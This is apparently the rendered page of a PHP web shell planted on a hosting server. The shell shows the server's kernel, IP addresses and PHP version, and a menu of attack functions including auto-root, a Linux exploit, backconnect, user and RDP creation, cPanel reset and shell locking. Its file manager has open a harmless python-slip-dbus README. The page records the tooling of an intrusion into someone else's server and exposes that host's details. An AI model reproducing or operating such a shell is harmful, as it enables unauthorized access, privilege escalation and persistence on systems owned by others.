Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.93.34
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-slip-dbus-0.4.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
example
[ DIR ]
drwxr-xr-x
README
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
This package contains slip.dbus.service.Object which has these features: 1) It easily allows to create dbus-activated services which end themselves when their clients disconnect from the bus. This is helpful if you want your service to survive along with its client(s) because it e.g. contains non-trivial state, does other things on startup which are expensive in some way or monitors other things and notifies dbus clients about it. Usage: In the most simple case just derive your service class from slip.dbus.service.Object instead of dbus.service.Object, then call slip.dbus.service.set_mainloop () before actually running your main loop. No changes to your client code are necessary. 2) It simplifies hooking up your services with PolicyKit. Usage: Mark your service methods with the @slip.dbus.polkit.require_auth(action_name) decorator. If you want to enable using PolicyKit with an API <= 0.9, you need to mark the corresponding proxy methods with the @polkit.enable_proxy decorator. NB: Remember that PolicyKit action names have to be lower-case.
Close